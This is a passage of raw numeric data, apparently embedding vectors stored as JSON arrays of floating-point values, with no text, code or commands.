12227377,0.0014001003,-0.008021048,0.0012347683,0.0057839514,-0.005546284,-0.02008324,-0.008292926,0.018709699,-0.0037839573,-0.0025251096,-0.001628534,-0.013076472,-0.006706126,0.03297064,-0.0002945371,0.05033455,0.01637479,0.019022789,-0.0060646576,0.026035605,-0.003885026,-0.032596745,-0.005675604,-0.0069479262,-0.008722441,0.030676855,0.01782808,-0.0048619355,0.011436848,-0.0069923513,-0.024389843,0.011226149,0.007516267,0.009180751,0.013238948,0.00822784,-0.0090838,-0.0026257164,-0.01922964,0.026081853,0.009860387,0.023598544,0.001312378,-0.022013547,-0.007842527,-0.010158606,-0.021476664,0.023056624,-0.011997078,-0.010418499,0.005119176,-0.017073944,0.0020903489,0.00434692,0.0060678446,-0.002099419,-0.014073208,0.0075024334,-0.0150314085,-0.0031919915,-0.01401332,0.0015131627,-0.00046889595,0.014665922,-0.013622701,-0.011120693,-0.033953868,0.014203245,0.010063378,-0.006057885,-0.0146201635,0.0020093317,-0.0040838467,-0.006532782,0.004644967,-0.0055801305,-0.024079876,0.01220481,0.014354677,0.012646966,0.0074493755,0.0001398477,-0.014877581,0.002296886,-0.012889731,-0.0045001497,-0.0026123985,-0.014300564,-0.00717399,0.02332535,0.016682088,-0.004266389,-0.0014111759,-0.0071125547,0.012428443,-0.020111809,-0.0069860755,-0.013093849,-0.0020932935,0.015191777,-0.023294386,0.011728911,0.0007414138,0.008690632,-0.010927292,0.006425754,0.026287414,0.0033135463,-0.0047936533,0.018148588,-0.010489455,-0.0005516483,-0.017144307,0.0066098375,0.032758966,0.10730623,-0.0026715356,-0.0068684937,0.027406126,-0.0013334807,-0.01698513,0.010783775,-0.0015656785,-0.008358544,0.0014364442,0.010813095,-0.008945849,0.02298392,-0.0053747804,-0.012749453,0.031955637,0.012414694,-0.019858876,0.008554887,0.01266307,0.02159292,-0.027687142,-0.009028477,-0.04166979,-0.028634746,-0.06430039,0.018895231,0.019218529,0.0034646539,0.037313476,0.016975988,0.008438208,0.010318421,0.0098933,-0.0028156524,0.016025783,0.027320974,-0.011748727,-0.0014972226,0.016947694,0.0108439205,0.008837723,-0.004707517,-0.013440926,-0.0017639595,-0.006996492,0.005118675,0.0031925065,-0.009525587,-0.021050923,0.0076209833,-0.009216869,0.003227466,0.0016891746,0.0114348335,-0.012917829,-0.0027123033,-0.009069977,0.022481514,-0.025657287,0.012151396,0.0061710724,-0.00044977144,0.0034022597,0.0048072618,-0.0064482987,-0.005642866,-0.015210567,-0.016597055,-0.007317901,0.014858757,-0.0040110694,-0.0030217492,0.011156713,0.008692861,0.0066714264,-0.0002980817,-0.013027168,0.017069124,-0.008498901,0.008520191,0.0016174136,0.006983236,-0.018958723,0.00036636557,0.014166617,-0.015490949,0.004861428,-0.014523332,-0.026212536,-0.009871949,0.009667161,0.015442403,0.0073992596,-0.007176824,-0.016801022,0.014888769,-0.0022976405,-0.008054417,-0.0068689873,-0.025364112,-0.021098718,0.0047857543,0.014928594,-0.012202076,-0.0011451327,-0.006978885,-0.020688843,-0.0023617623,-0.011099815,0.008016019,0.03326916,0.0044377274,0.0059036906,0.013109402,0.039460205,-0.03267382,-0.023493638,0.0164846,-0.014982532,-0.008893358,0.016082821,0.005591506,0.040824227,0.018266156,0.017926697,-0.018691551,-0.0056728204,-0.009325031,0.0039016532,0.011145144,-0.017565418,0.010989152,0.027862178,-0.0082312515,-0.0064139655,0.04363802,0.0110540865,0.010027677,0.002489418,0.00073540315,-0.017669866,-0.0059427596,-0.008888632,0.01083031,-0.017796649,0.013716693,-0.016772091,-0.0061887614,0.0005309018,0.0048734997,0.0047643003,-0.012903706,0.023854325,0.00790048,-0.019759526,-0.009522245,0.010805272,0.019893425,-0.0075338786,0.0033947988,-0.021493608,-0.003604098,-0.03622017,0.02034847,0.003764536,0.008653052,0.010425586,-0.012749028,-0.0060700523,-0.0074013895,-0.0045015216,0.006294623,0.007764436,-0.0054843654,0.018579032,0.0064677163,0.01508648,-0.015228695,-0.009939924,0.002103197,0.0015643537,-0.004362036,-0.017891986,0.016637683,0.004803585,0.03342491,-0.016034598,-0.031085273,0.028351447,0.006845052,-0.0068043196,0.014553965,0.030579,-0.02206556,0.01860993,-0.028610915,0.03961117,-0.012901541,-0.032814875,0.0022692818,0.012089752,0.008115914,-0.036965273,0.017137086,-0.013405328,-0.003666692,-0.011760797,-0.0058993604,0.010347969,0.024970368,-0.00739422,-0.006944356,-0.04286479,0.013009908,0.0027645053,-0.0097051235,-0.020601764,-0.011531437,-0.007668906,0.011297116,0.020135038,0.0033248544,-0.0063737934,0.00008231588,0.015517962,-0.00450332,0.019037584,0.026801448,-0.03193245,-0.02482083,0.02456344,0.010041569,-0.009378087,-0.018290343,0.0046428246,0.021473821,0.017574357,0.012418026,0.013587404,-0.013858882,-0.006191595,0.016741024,0.008014798,-0.016828911,0.003926846,-0.000013215961,-0.016119929,0.0037276475,0.0041356925,-0.02090409,-0.0012548788,-0.0020724281,-0.022000562,-0.030874668,-0.008997695,0.009488594,0.008648194,0.002048429,-0.001980086,0.013530035,0.007509868,-0.008826535,0.02457975,-0.004301295,0.0022697332,0.016959883,-0.00742011,0.00423048,-0.0021730433,-0.008671965,0.012782848,-0.020224998,0.032170214,0.021132126,0.0008795995,-0.0060716853,0.001799167,-0.0036750832,-0.0031310068,0.008110905,-0.016253846,-0.013041199,-0.025394248,-0.0023978637,0.002288903,-0.004907485,0.018492118,0.059803635,-0.066707805,-0.0040896973,0.034290012,-0.0038385398,-0.038461223,0.03371033,-0.00020488772,-0.023351485,-0.007625225,0.015639715,0.022854999,0.0076556634,-0.04938096,-0.009378405,0.021561494,-0.017428001,0.0033047113,0.019777948,0.00031521948,0.0019559383,-0.0040451577,-0.003826013,0.0021128757,0.00031534527,-0.012270425,-0.0038758977,-0.023036588,0.011470197,0.013783749,0.012748676,0.020286653,0.0157041,-0.0033589613,0.0031766177,0.0138447145,-0.00029477177,0.021745872,0.0049540023,-0.028888037,-0.0057059824,-0.014086292,-0.001044793,-0.007364834,0.0023279705,-0.009986814,-0.011168674,0.011936939,0.0041716946,0.1287696,-0.02436189,0.0039108787,0.016326131,0.0014222555,-0.0045698374,0.010941276,0.019603677,0.011090437,0.021646243,0.02400854,0.004094989,0.006648759,0.031698626,0.012109004,0.00017058154,0.010557215,0.13764682,-0.016701825,0.025919786,0.006850749,-0.0053761173,0.019718105,0.0014043719,0.016356055,-0.064510696,-0.009445982,-0.025473109,-0.004319899,0.009571568,-0.0113865025,0.022108033,0.0053792284,0.012630018,-0.023674984,0.017962039,-0.0023651167,0.0041221366,-0.0033818427,-0.013132968,0.027792837,-0.0031976784,-0.015462081,0.0008616773,-0.033211738,0.022500413,-0.029189391,0.0052403533,-0.0135955,0.02230529,-0.0017715322,-0.0008818391,0.0053179753,-0.0066238767,0.0023355572,0.007465354,0.0012449272,-0.0051632263,-0.015129349,0.022894945,-0.0043708826,0.013985533,-0.0029863026,0.020243863,-0.019515399,0.0023731505,0.010892398,-0.003004868,0.007840764,0.010119543,0.030012202,-0.002042043,-0.022211287,-0.011871545,0.037531417,0.0017103384,-0.00031744989,0.0045497017,0.0048542744,0.008027584,0.025133207,0.019620096,-0.007486849,-0.0034106944,-0.0027783555,0.023830554,0.010850043,-0.0014734624,0.029908068,-0.00090133864,-0.00093720516,-0.014719999,-0.00720229,0.004297367,0.009222314,0.04082083,0.01717251,-0.0037551355,0.018385427,-0.016711324,-0.009328574,0.01655919,-0.009895174,-0.006579195,-0.022802485,0.012869422,0.0028726836,-0.02934211,0.005792357,0.005436869,0.00035662134,-0.009644889,-0.013041311,0.030177414,-0.0040137745,-0.0047167083,-0.018808441,0.0007323251,-0.025349526,0.0123678185,0.003371423,0.0037480935,0.000070735674,0.0015757853,-0.022960305,0.005588507,0.008400544,0.03117674,-0.017051164,-0.0012787349,-0.022972254,0.006451811,0.00810802,0.047692113,0.008654645,-0.0075155646,0.010481869,-0.045693267,-0.021917611,-0.0019857008,-0.0065745735,-0.0009092267,0.008421772,0.012934731,-0.0013408656,-0.0025352382,0.0117939925,-0.011906334],[-0.0061732293,0.0048936415,-0.017676918,-0.018351257,-0.0046633547,-0.012815758,-0.0006704753,-0.0066748797,0.010390441,-0.011505368,-0.014529919,0.028311776,-0.006237543,-0.0015760498,-0.011111931,-0.0019577944,0.021112638,-0.0038421336,-0.009960214,-0.0034018573,0.002843519,-0.007927638,0.019089626,-0.014839485,0.0060638734,0.006806628,0.00015440707,-0.016107485,0.007396208,-0.00091604935,-0.0035879032,0.022106176,0.009518096,-0.0024353396,0.014380264,0.009523325,-0.009639779,-0.01849874,0.0016389573,-0.0049167788,0.0084228935,0.014275207,-0.0107117975,0.016436396,0.0048993616,0.0045670327,-0.022347948,0.014080263,-0.017046211,-0.006226578,-0.0070510586,-0.00489716,-0.020776765,0.02917305,-0.013535243,0.00853239,-0.0010783848,-0.029567122,-0.010415636,-0.010824701,-0.018828146,-0.0017246179,0.0031923512,-0.016677694,0.03329514,-0.0025633879,0.0045096455,0.0000148257395,-0.0027104968,-0.024156211,0.009332529,-0.019344945,0.0071384697,-0.0057082083,0.019206878,0.0068539903,-0.0006409256,-0.0072794575,-0.017571883,0.01455436,-0.003978645,0.0037556752,-0.017274493,-0.008877873,0.028118407,-0.00945347,-0.006822291,0.011594783,0.014253254,-0.023930505,-0.0054252706,0.0024656982,-0.004375203,-0.0091437055,-0.009812066,0.015133436,0.015100862,-0.004326275,-0.015738077,0.018279918,-0.013592873,-0.0034414153,-0.042642955,0.0150372,0.016424205,-0.0126561755,0.0116719855,-0.0033635544,-0.0032880262,-0.014892718,0.0018924089,0.0071306727,0.00080200145,0.0065768915,-0.013878191,-0.00046426905,-0.010686195,0.018385116,0.00051804737,0.010810834,0.00058070995,0.014562278,0.0029141866,-0.010692489,0.0021884576,0.003830092,0.0002642365,0.023057254,0.01041334,0.0021205004,-0.0042741336,0.014185562,-0.006489474,-0.0134843895,-0.0021819044,-0.00013851083,-0.0038190286,-0.012179869,-0.010817518,-0.011475952,0.013634872,-0.0016090901,-0.0004299859,0.0067953006,0.021292431,0.014934506,-0.0022398932,0.0141722085,0.024073165,-0.019457784,0.0065352065,-0.009722712,-0.009661699,-0.013660594,0.0059368215,0.027035655,0.0073263394,-0.011673909,-0.023017505,-0.008563081,-0.014171296,0.0047652586,0.0028601727,-0.0038385992,-0.001970962,-0.041806653,0.0016511806,0.004848853,-0.018905373,0.0088302735,0.013277551,0.045868587,0.013947232,0.0024154733,0.012962131,0.024319947,0.010772483,-0.015427594,-0.014833518,0.005526371,0.013311897,0.014208082,-0.0033180264,0.011072151,0.0036597084,0.021151591,0.017082049,-0.008525224,-0.019822083,0.0010476663,0.019586522,-0.014565439,0.0055087884,-0.0024964877,-0.010902213,-0.014266743,-0.009118111,0.11362837,0.0006117891,0.007397968,-0.029121945,0.008827111,0.0014638795,-0.017156577,-0.008283786,-0.0065491945,-0.0067351228,-0.011386308,0.023893647,0.007867581,0.014998512,0.009755236,-0.004405595,0.01986964,0.0010189607,-0.04686107,0.0092035355,0.024679285,-0.0051716133,-0.0002860925,-0.009107607,0.005966938,0.009954746,-0.029229088,-0.0032116794,-0.028312726,0.016755655,0.008195459,-0.0022472746,-0.015760228,0.018791035,0.014907064,-0.01353027,-0.039580546,0.009199434,-0.012168076,0.0025729632,-0.025387965,0.005501536,-0.00088236696,-0.018197408,0.009136986,0.027277803,0.03612483,-0.015243125,0.001431692,0.021306582,0.01724045,-0.029013466,0.002426265,0.0003213141,-0.0037311143,0.005420111,0.02670153,-0.0018298265,-0.022523971,-0.0042851456,0.013450477,0.0027537611,0.009795521,0.016701253,0.0025282924,-0.005897731,0.0270428,0.022388993,0.01249678,0.004171811,-0.03466792,-0.012214515,0.0041374704,-0.0036309494,-0.0021231365,-0.012247526,-0.0052383575,-0.0054533696,0.004392249,0.01023046,0.0057726447,0.009581894,-0.010792373,-0.002459407,-0.00033147418,0.000624692,-0.029684529,-0.0036417767,0.0040507535,-0.008011676,0.015712474,0.034940694,-0.008102207,0.00582915,0.0030276198,0.028861849,0.0154244425,-0.013475097,-0.0070324647,-0.02038957,0.0037460276,0.012706981,-0.03134182,-0.0042264247,-0.0033831466,0.01377818,-0.008428105,-0.008349394,-0.015182426,0.007188375,0.029269852,-0.0074700215,0.022667063,-0.040010072,-0.006983393,-0.029588444,-0.010128514,0.0031530766,-0.01255513,0.0063283094,-0.02408269,-0.0029376233,-0.0077858465,0.017952992,-0.015687032,-0.006201285,-0.031575352,-0.025836013,0.00927757,0.0067995423,-0.029596766,0.009731792,0.0075557535,-0.021703515,0.015432544,0.025534363,0.014944798,-0.008367714,0.023098292,-0.007177988,0.02559276,0.008377845,0.0291985,-0.0023882643,-0.016834477,-0.0050800727,0.012764432,-0.0063012005,-0.0014865606,-0.020151183,0.0036498986,0.018073233,-0.005151705,0.02717879,-0.029040694,-0.0013633589,-0.02926302,-0.014248077,0.009410578,0.004257382,-0.006436073,0.0017796415,-0.024557514,0.020446207,0.006737353,0.008623735,0.007415871,0.085817605,-0.0065897168,0.0044607054,0.0063364985,-0.015552081,-0.0047959336,0.028497286,0.022253461,-0.00089850894,0.005829652,-0.02256273,-0.011604051,0.0027032346,0.009924305,-0.016048666,0.023067104,-0.015711738,-0.011778813,-0.017239884,-0.001726385,0.024221,-0.015045249,0.005669226,0.026082,0.0065552117,0.022408342,0.015678683,0.00004832317,0.00860574,-0.031628657,0.00077108416,0.005656956,-0.002005594,0.004418413,-0.04202138,0.012304843,0.02271288,0.011487132,-0.0120202275,0.003852077,0.0021095295,-0.0013654141,0.00782765,-0.022464242,-0.00025461856,0.041791424,0.00969721,-0.002969292,-0.024303645,0.019463489,0.0033922128,0.010688126,-0.015271357,0.006781173,-0.0058359765,0.0141873285,0.005648813,-0.04069042,0.039502487,0.014090334,0.013514743,-0.0022732846,-0.0019876694,0.010464965,-0.0073233144,0.033083748,-0.023923658,-0.00015543342,0.011110755,-0.008276136,0.021012638,0.028385691,-0.019441217,0.014905281,-0.0140765235,0.01839026,0.005001681,-0.00789282,0.022166373,0.019308548,-0.0066571673,0.019438582,0.023913251,0.0015859832,-0.009920646,0.0034334094,0.004874156,0.00092554186,0.010026851,-0.004299808,-0.010039478,0.01811212,0.0004894772,0.021094406,0.027906498,0.014486792,0.019333007,0.024458311,0.013911144,0.01031403,0.02003849,-0.00871384,-0.0033983383,0.0025565627,-0.013658973,-0.0014867001,0.026386514,-0.0055247713,0.0011894436,0.0258461,-0.024323268,0.0113947075,0.011031658,-0.009964158,-0.0016874722,-0.021621034,0.0037694739,-0.017972369,-0.007749029,-0.014244184,0.017909886,0.001016552,-0.008599501,0.009441928,0.0097073335,0.0008001241,-0.0071241967,-0.013520917,0.010108845,0.021119403,-0.003451085,0.046359513,0.012417977,-0.026910633,0.022046288,0.0107986145,-0.019471727,-0.03414944,0.05110723,0.002026063,0.027128188,0.025419122,0.036416855,-0.015770502,0.005907321,0.030500505,0.036111087,-0.0009628749,-0.023434773,-0.0126154525,-0.0054635447,-0.0067061703,0.012652104,-0.0015565311,-0.006564017,-0.0046694074,0.039393626,-0.028659247,-0.005725582,0.008534828,0.025096888,-0.008571347,0.0016117222,-0.009649963,-0.022337502,0.014221979,-0.0111159105,0.0726154,-0.01401837,-0.030843044,-0.006759273,0.007723307,-0.011906206,-0.010551419,0.0060521374,-0.023734115,0.022406783,0.014050879,0.03252512,0.021154365,0.023343233,-0.0007261065,-0.005027324,0.030108912,0.010323806,0.0026556237,0.0074006543,0.00030606292,0.004370598,0.0017285688,-0.01749265,-0.028865064,0.0027909472,0.024502229,-0.008925759,-0.01138689,-0.002933579,-0.02446614,-0.000051541483,0.02103475,0.0032997157,0.009913756,-0.013452844,0.015072467,0.0021849521,-0.02128534,0.018418226,-0.010204254,0.004717049,0.009775495,0.003930472,0.029358834,-0.0027413606,0.006424917,0.0025865631,0.012950087,-0.013357716,-0.0012117914,0.012653137,0.019643469,0.02368061,-0.011370472,0.0031253041,0.01926365,0.0068105697,-0.030523581,0.014643451,-0.008702827,-0.008750834,-0.0046282453,-0.008667735,-0.024766633,-0.0067493496,0.017162023,-0.025498303,-0.012023614,-0.01455139,-0.0074820686,0.022107553,-0.011699964,-0.019594584,0.02037484,0.0059252926,-0.013505992,0.004956112,0.018161487,-0.015674945,-0.010608901,0.014377965,-0.0045821955,-0.0063942573,0.008156285,0.0016828055,0.0086529525,-0.008287379,0.015281713,-0.004810425,0.01924138,-0.013312738,0.004752138,-0.0015939596,0.00019825272,0.025442153,0.004315557,-0.035927158,-0.008913639,0.006168789,-0.03102047,0.0029189426,-0.016614178,0.047944143,-0.017490288,0.009277242,0.0076004555,-0.006358578,0.0073689334,-0.023900477,0.021481711,-0.04716276,0.00032401332,0.008749183,0.011992552,-0.01583388,0.036510974,0.047966957,-0.00021428672,0.0016209278,-0.0038892042,-0.011457247,0.0022917222,-0.006877197,0.0072486154,0.00040114488,-0.0011723357,-0.032468237,-0.01372674,-0.02043313,-0.06587524,-0.041019756,0.046921674,-0.0021975895,-0.009584664,-0.0032541296,0.019074548,-0.00619718,-0.010258215,-0.010680009,-0.0410655,0.004087546,0.01027481,-0.00038731788,0.011905742,0.012347873,-0.0034230256,-0.0075355577,-0.016771598,-0.014184945,-0.00084623834,0.01069095,-0.02980073,-0.003635446,0.012296335,-0.013613414,0.008482305,-0.033912156,0.02821778,-0.008220548,0.059758704,0.03848465,0.008272654,-0.0073827608,0.018153554,0.0051181596,0.0025851422,0.017458577,0.019650329,0.0009026094,0.013665479,0.016236782,-0.005153302,0.012688712,-0.032585718,-0.0005772693,0.022871986,0.036936533,-0.0010543815,0.018636307,-0.011792142,0.019673018,0.016690081,-0.010106135,-0.0029831699,0.02189556,0.011632746,-0.011508148,0.024533642,-0.005281929,-0.006653479,-0.024666142,-0.027151974,-0.00881811,0.028694537,0.017883483,-0.010190192,0.0073538795,-0.0008971626,-0.003755932,-0.0125134755,0.0008246375,-0.011809568,-0.01723752,-0.016664948,-0.0052008606,-0.004899562,0.008218834,-0.03783143,0.013241612,0.008289695,0.004475151,0.0026172074,0.010678254,-0.016568745,-0.015456683,-0.015705623,-0.04330287,-0.011418767,0.004123239,0.020521257,-0.022053307,0.007259575,0.018438017,0.0117362775,0.017103367,0.0115899015,-0.021905003,0.00481832,0.0028329873,-0.008484313,0.025633972,0.007072626,0.004526533,0.010031052,-0.013412706,-0.008023427,-0.012510773,-0.015625551,0.0049618403,-0.0006135658,0.0029796227,0.0015763822,0.0041624554,-0.016490787,-0.025591312,-0.021083113,0.022606652,-0.04923776,-0.022067674,0.000758739,0.027888088,0.013645819,0.021196928,-0.026292318,0.024271905,0.014591211,-0.0037648159,0.002099911,-0.016250802,-0.002681321,0.032230627,0.015376416,-0.020620398,-0.034241877,-0.012091334,0.009893703,-0.012230814,0.0019439311,0.01120126,-0.016862879,-0.013534457,-0.026775997,-0.002774105,-0.027085032,0.004382738,-0.00019818981,-0.018579563,0.03056509,-0.011937446,0.016407013,0.009708252,-0.0038590399,0.00041259002,-0.012059945,0.027287241,-0.015679406,-0.013499611,0.033185124,-0.01739225,0.01140176,0.02464558,-0.032688554,-0.018701345,-0.030552927,-0.012858241,-0.019811202,0.018784566,0.002664113,-0.019622445,-0.020580092,0.013754212,-0.009729537,0.017112846,-0.028013885,-0.004238586,0.0055987122,0.0025236416,0.027940499,0.008146688,-0.03701658,0.0050254487,0.005558245,-0.027802512,0.017836684,-0.0008933013,0.007252651,-0.010417684,0.017846895,0.0015083498,-0.026731072,0.020091029,-0.013199866,0.0072515304,0.037571706,-0.016633084,0.011261228,0.0018931115,-0.010499392,-0.006300681,0.003911002,0.020975774,-0.00887123,0.0055260034,0.0026765743,0.0026654918,0.0069876513,0.0036289159,0.02510558,-0.007185167,-0.007438409,0.034917023,0.001716969,-0.033488624,-0.008928642,0.008252303,-0.0039495802,-0.006241726,0.0056427056,-0.007940947,0.038807053,0.0330223,-0.009903362,-0.00584838,0.03944028,-0.020643273,0.018358186,0.0146700945,0.001224229,-0.009753132,-0.011720217,0.026048353,-0.041197572,-0.02174976,-0.0049180654,-0.017255198,0.014009702,-0.016435068,0.0016746871,-0.006310231,0.0020285575,0.013794883,-0.004353047,-0.008148127,-0.004478889,0.022900064,-0.010781472,0.008581101,0.0049050315,0.002213577,0.00039445845,-0.0024177535,-0.016348794,-0.011893883,0.0061917095,-0.010922933,-0.011884168,0.0056116423,0.00051307515,0.013342644,0.005839179,-0.013018375,0.027870229,0.016987264,-0.012892,0.016409956,-0.018222773,-0.024085136,0.009118491,-0.0073269214,-0.038356457,0.0023036294,0.031170186,0.02389486,-0.013716037,-0.0030482963,-0.013865626,-0.052348193,0.020702673,-0.023650935,-0.021159874,-0.005736694,0.0121604875,0.013783849,0.013957705,0.028794035,-0.008057351,0.0041731824,0.017671999,0.032406155,0.015694154,0.0048245336,-0.018260757,-0.016508905,0.022079257,0.041841,0.0010860008,0.0040829433,-0.0025221375,0.008330071,-0.006540745,0.03142456,-0.0060700877,-0.0032479574,-0.015711838,-0.03257689,0.000092586604,-0.013306009,0.02035901,0.011993794,-0.012423279,-0.012870753,-0.006162771,0.023878923,0.008893795,-0.010519647,-0.0014738751,-0.0028416042,-0.01715401,-0.0106373,0.022011608,-0.01065146,-0.034951597,0.008943796,0.00037359848,-0.011941428,-0.0053693024,0.026811771,0.003139473,0.0014139106,0.016377699,-0.00058959844,0.019380393,-0.004258064,0.008802873,0.009893421,-0.005495353,-0.0027702649,-0.009490264,0.01902206,0.01945137,-0.027304018,-0.0071067433,-0.0027253763,0.044508882,-0.02404265,-0.0072598564,-0.024222177,-0.0043622316,-0.017799964,-0.008843699,-0.045867838,0.012628367,-0.00004315254,-0.012567328,-0.0045236903,-0.0157615,-0.0022495773,0.0125801135,-0.0332929,-0.007784436,-0.042967603,-0.024527697,0.0075310934,0.010874244,-0.016366383,-0.02355689,-0.0020828585,0.003616984,-0.0087646125,0.011896594,0.0010719356,0.034097075,-0.01161747,-0.012471049,0.005869112,0.0017670881,0.029143894,-0.0018003224,-0.0060854033,0.06231621,-0.007860355,0.00075972633,0.018739782,0.0027918806,0.03887375,0.029495524,-0.0113458,0.008790995,-0.027175631,0.017285325,0.013428001,0.008606776,-0.008665559,0.023856144,0.024302708,0.027719313,-0.007855496,-0.001316086,0.031942815,0.0020645189,0.020235002,-0.0001789849,0.018211257,-0.0018005111,-0.013848054,-0.002992912,0.002707045,0.025485639,0.009279611,-0.025683975,0.024388881,0.0097424695,-0.0081804665,-0.028946545,-0.01168906,0.012083039,-0.018164778,-0.003224002,-0.024628308,0.0060750037,-0.009038088,-0.030709106,-0.0027797145,0.01763226,-0.009184923,0.01648458,-0.00009426312,0.007950066,0.0064291856,-0.008693798,0.012272236,0.0059486474,-0.0007543,-0.017308684,0.006425375,0.011494816,-0.028765695,-0.025660612,-0.0174333,0.0069720694,-0.043281477,0.007374858,-0.013925334,0.018920537,-0.023508906,-0.008997167,0.0017861489,0.0022796043,-0.014267455,0.034287445,0.0017183385,-0.020472879,0.026358958,0.01119673,-0.006268035,0.012790204,-0.014583581,0.034657165,0.008965587,-0.016500125,0.004008757,-0.013851324,-0.017906496,-0.016821947,-0.018794762,-0.013669793,-0.016568456,0.0016909308,-0.0036620307,-0.0019985756,-0.021038538,0.047926165,-0.022323422,0.027507413,-0.0041792165,-0.012775764,0.00018994953,0.008704105,0.019600645,0.012179316,-0.018050827,0.02487179,0.03048487,-0.054391947,-0.000111914575,-0.0077010742,0.0030924182,-0.018353967,0.0030064455,-0.014762491,-0.019834654,-0.009844549,-0.023673434,0.010241937,0.017454857,-0.019340204,0.001176587,0.03131362,0.02027193,0.008384897,0.0000992487,-0.020308154,0.017312393,0.013006996,0.0130360825,0.0015726408,0.038398787,-0.001267632,0.027355244,0.024992228,-0.026508579,0.0057625053,-0.0072753974,-0.0007789531,-0.0372959,-0.013145563,-0.005380074,0.01414987,0.021565672,-0.02250357,-0.012697861,0.02744998,-0.001778378,0.0034380932,0.0021314872,0.020663895,-0.01970515,0.0049423585,0.006408517,0.016447924,-0.0019575532,0.016715342,-0.022999749,-0.0016637774,-0.0027533106,-0.0068485243,-0.004840525,-0.0062899645,-0.015960906,0.0063872775,-0.0058738147,0.01584111,-0.010966464,0.010387724,0.027233055,-0.0009862494,-0.0053602317,0.0021160436,-0.0014733952,0.011621668,0.014276968,0.011371195,-0.008730052,-0.011439444,0.016441207,0.006758217,0.013192783,0.007896961,0.00047830353,-0.031514194,0.005781003,0.02101628,0.023982288,-0.011909286,0.016158137,0.0020775103,-0.01124676,-0.0281727,0.0108794095,-0.0056111505,0.01616002,-0.0033414178,-0.0057632346,-0.0111918,0.0036422263,-0.0031476654,0.07042777,-0.02097722,0.022884326,0.001053491,0.014035853,-0.020082189,0.007024598,0.00096217473,0.017926764,-0.018833295,-0.026946787,-0.029940125,-0.027023533,-0.02141044,0.004903294,-0.00623057,-0.0031514883,-0.0010024254,0.001300125,0.025370397,0.009620764,0.0054919263,-0.0044808835,0.01311921,-0.006104011,0.018051675,0.017780874,-0.032897174,0.020187305,0.003917725,0.008926911,-0.009904549,-0.012469171,0.020384975,-0.0064263083,-0.0008569903,0.0049077347,0.011509326,-0.041082043,0.024816252,0.012251257,-0.007131941,0.024951965,0.011276505,0.037619736,-0.0058727018,-0.0204135,-0.024268046,0.004242779,-0.015531559,0.016219413,0.0009066773,-0.018448366,0.00803125,-0.030588381,0.033742614,0.0050494643,0.027760755,-0.002788098,0.0032931736,-0.008640012,-0.0013184114,0.0040255864,-0.0047065127,-0.004137666,-0.0073786923,0.0025196169,-0.016608376,0.026013546,-0.033525154,0.0020836813,0.0020405815,0.015658326,0.023227362,-0.01706333,-0.0041020066,-0.0006718326,-0.008409726,-0.013564644,-0.02558463,0.00010797659,-0.015564215,0.031080134,0.027285455,-0.013649037,-0.0009903145,-0.008828056,-0.0006498194,0.07672833,0.01676285,-0.0016506595,0.0031204263,0.000051735373,0.022770299,0.0048010554,0.018238809,-0.010195281,0.011091864,-0.019507613,0.010218303,0.001974443,0.008070774,0.010526674,-0.019773802,0.00083055184,-0.0011535187,-0.0030733957,-0.010753645,-0.0016583693,0.032928552,0.013069522,-0.0054187276,-0.0035162144,0.0062197084,0.02173081,-0.011247102,0.007461611,-0.015382713,-0.006526408,0.02841773,0.017186379,0.0059331506,-0.0124959005,-0.033505414,0.0133711705,0.12019205,-0.013632763,-0.001960923,0.012748008,-0.006022491,0.013543111,-0.098325856,0.014464914,0.009199657,-0.008146602,0.015357057,-0.0012266485,-0.008764332,0.027664635,0.017975397,-0.005085795,-0.022203641,-0.00096888514,0.018182803,-0.013019784,-0.009755876,0.0016251891,-0.010029556,-0.013384136,-0.022287996,-0.0011857746,-0.0041806432,-0.014142529,-0.019246524,-0.01167448,0.015215484,-0.006954581,0.016451973,-0.005344812,-0.030823207,0.012716807,0.017648928,-0.0024675145,-0.006952058,-0.020084124,0.007726586,0.003942342,-0.016063323,-0.03769501,-0.14895673,0.014652911,0.0068412917,-0.03898586,0.013308541,-0.007304122,-0.012109643,-0.0049253167,0.013748134,0.022362133,-0.015526994,0.0080537805,0.007107663,0.0012909583,-0.028301334,-0.010187187,0.005900497,-0.0046828836,0.00085569074,0.009031907,0.014557615,-0.00033769125,-0.018831387,-0.004343413,-0.010591054,0.007795554,-0.0063933926,0.038418226,0.007970163,-0.00744269,-0.00003454976,0.0058164536,-0.027253652,-0.0019219948,0.0017436628,-0.014891206,-0.010484537,0.0030374657,-0.0026208695,0.015542546,-0.004140887,-0.009525672,-0.006370612,-0.012377613,0.007209003,0.029762682,-0.0008424246,0.00004689869,0.024774706,-0.00246204,0.030156875,0.0018758404,-0.010393363,0.0069336314,-0.009468469,0.0065533333,-0.010336563,-0.030103436,-0.009956177,0.007652526,-0.00451053,-0.009915218,-0.0033821017,-0.009057531,0.034785453,0.004302493,0.024107112,-0.0015980918,-0.0078521855,0.006894191,-0.019232841,0.003248992,-0.011784724,-0.018237397,0.022691121,0.009192022,0.0110784415,0.0088345045,0.011496126,-0.016079519,0.012692343,-0.017618177,0.0015860851,-0.037676092,0.018459553,0.0075691487,0.007450577,-0.000508571,-0.003548129,-0.01324913,0.021216968,-0.021037877,0.012394476,-0.006277186,0.026803717,0.0113842245,0.04369175,-0.009930752,-0.026703062,0.009695236,0.012566251,-0.025094297,-0.019012379,0.0067949523,-0.021719942,0.0068602758,0.0052138506,-0.0057797628,-0.016337821,-0.0073283114,-0.008055191,-0.017394932,0.029157808,0.006041103,-0.025649061,-0.0359527,0.008749751,-0.007994978,0.018742058,-0.027766522,-0.026402965,0.017655833,0.0023933414,0.0016211843,0.053939644,0.03011204,-0.038143054,-0.01101557,-0.004765758,0.005337224,-0.03884757,0.016050363,-0.0058877342,0.002947559,-0.018965669,-0.010179,-0.009911416,0.016527465,-0.027989266,-0.0042406265,-0.002911966,0.016329173,0.010721099,-0.011084234,0.0052296473,-0.0011644964,0.020034818,-0.0057952483,-0.00047878802,-0.006460253,0.000814196,0.026436675,-0.037726585,-0.009611904,0.027022947,0.05521384,0.002099397,-0.018161286,0.022992527,0.009913438,-0.002169163,0.018070746,-0.020586494,-0.0010673327,-0.005860342,-0.033641398,-0.009664025,-0.0015519126,0.017882658,-0.0182027,0.004968841,0.012936866,0.029646557,0.0020690728,-0.004645501,0.025456492,-0.011669741,-0.016400572,0.018150143,0.016599998,-0.004633426,0.02082642,0.017662207,-0.00550356,0.0034442549,-0.017476784,-0.02221557,-0.019470787,0.006369182,0.00858119,-0.037496135,-0.02332557,0.0073127714,-0.0009003287,-0.024502957,0.0021873086,0.016766196,0.004737777,-0.016161978,0.0051991064,-0.026864704,-0.014087879,-0.0046115085,0.0013615089,-0.0073308507,0.00797236